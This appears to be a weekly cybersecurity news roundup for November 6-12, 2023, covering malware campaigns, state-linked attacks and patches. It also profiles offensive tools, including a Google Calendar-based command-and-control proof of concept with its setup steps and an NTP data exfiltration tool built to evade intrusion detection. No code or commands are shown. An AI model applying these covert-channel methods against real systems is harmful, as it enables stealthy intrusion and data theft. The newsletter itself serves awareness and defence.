Week 45, November 6-12, 2023
Week 45, November 6-12, 2023. Cybersecurity Weekly Updates.
This week in the world of cybersecurity:
A new Jupyter Infostealer version is causing trouble with its stealth tactics. Meanwhile, QNAP is fighting back with a patch for critical flaws. Android users need to be cautious as SecuriDropper slips past Google’s safeguards. Iranian hackers have been busy with cyber attacks on Israeli tech and education. Google has put out a warning about potential misuse of their Calendar service by hackers. On the international front, the U.S. Treasury is taking a stand against Russian cybercrime by sanctioning a known money launderer.
North Korean hackers are making headlines for targeting macOS with BlueNoroff malware. There’s a new GootLoader malware variant that’s hard to detect and spreading fast. In a concerning report, many are losing confidence in file upload security. The WinRAR flaw is the latest exploit by SideCopy against the Indian government. Ransomware experts are warning about hackers targeting Atlassian and Apache flaws. Veeam ONE software users need to patch up due to critical flaws.
Crypto mining techniques are becoming more stealthy, even on platforms like Azure Automation. For WhatsApp users, there’s good news with a new feature that protects your IP address during calls. Developers, watch out for BlazeStealer malware in Python packages on PyPI. In ransomware news, the Farnetwork’s model has been exposed.
A zero-day alert has been issued for SysAid IT software, and a new malvertising campaign is mimicking a Windows news portal. Iranian hackers are also using a new C2 framework against Israel. CISA has alerted about a high-severity SLP vulnerability now being exploited. Russian hackers Sandworm have caused a power outage in Ukraine.
Even after patching Atlassian Confluence servers, the ‘Effluence’ backdoor remains persistent. The Middle East’s tech sectors are the latest target of the Iran-linked Imperial Kitten group. Stealthy Kamran spyware is focusing on Urdu-speaking users. Lastly, Microsoft warns about fake IT job assessment portals that target job seekers.
Recent Tools and Techniques
These are some of the recent tools and techniques in the cyber-security sphere that have captured my attention.
Telegram Explorer (TEx) is a digital tool designed to assist in the collection and analysis of data from various Telegram groups potentially involved in illegal activities. This tool is specifically tailored for use by researchers, investigators, and law enforcement personnel. TEx provides a suite of features including a connection manager, group information scrapper, and the ability to list groups. It supports automatic syncing of group and user information, a messages listener, a message scrapper, media download capabilities, HTML report generation, and options to export both downloaded files and messages. It operates on Python 3.8.1 or higher, with a recommendation for version 3.10+, and is compatible with Windows x64 and Linux x64 systems. Currently in beta, users are encouraged to report any encountered bugs through the project’s GitHub issues page.
Google Calendar RAT (GCR) is a proof of concept (PoC) tool designed to establish a command and control (C2) communication channel using Google Calendar events. It provides a method for executing remote commands without the need for a full red team infrastructure, requiring only a Gmail account to operate. The tool utilizes the event description field in Google Calendar to send and receive commands to a target system, essentially creating a covert channel for communication. This method takes advantage of the existing Google Calendar API and network traffic to Google servers, which can make it blend in with regular traffic, avoiding detection. To implement GCR, users need to set up a Google service account, obtain a credentials.json
file, and configure a new Google Calendar shared with that service account. Commands are scheduled as calendar events with a unique identifier in the title and command details in the description, which includes a base64 encoded output. The system checks for new commands, executes them, and sends back the output using the same channel.
Ntpescape – NTP exfiltration tool designed for the discreet movement of data through the Network Time Protocol (NTP). It offers a method to send information from a system while making the process hard to spot. This tool works by placing data within the last section of NTP client packet timestamps, where data is naturally unpredictable. It ensures security by encrypting the content with a key that changes for each paired sender and receiver, making the data look random and safeguarding it from unauthorized access. Responses from the receiver mimic those of an actual NTP server, with believable timestamps and updates, making it challenging for intrusion detection systems (IDS) to pinpoint any anomalies. The tool also includes features for reliable transfer, like packet retransmission and realistic timing between requests, mirroring typical NTP client behavior.
That’s a wrap on this week’s edition of the Cyber-Security Update. Remember, the cyber-security landscape is ever-changing, and staying informed is your primary defense. Hopefully, the insights and information shared today will assist in navigating this complex domain and in strengthening defenses against potential threats. Stay vigilant, stay informed, and look forward to more insights into the world of cyber-security in next week’s edition.
To stay in sync with the weekly cyber-security roundups, remember to subscribe to the newsletter and follow on social media platforms. If there are any questions or specific topics you’d like to see covered, don’t hesitate to get in touch.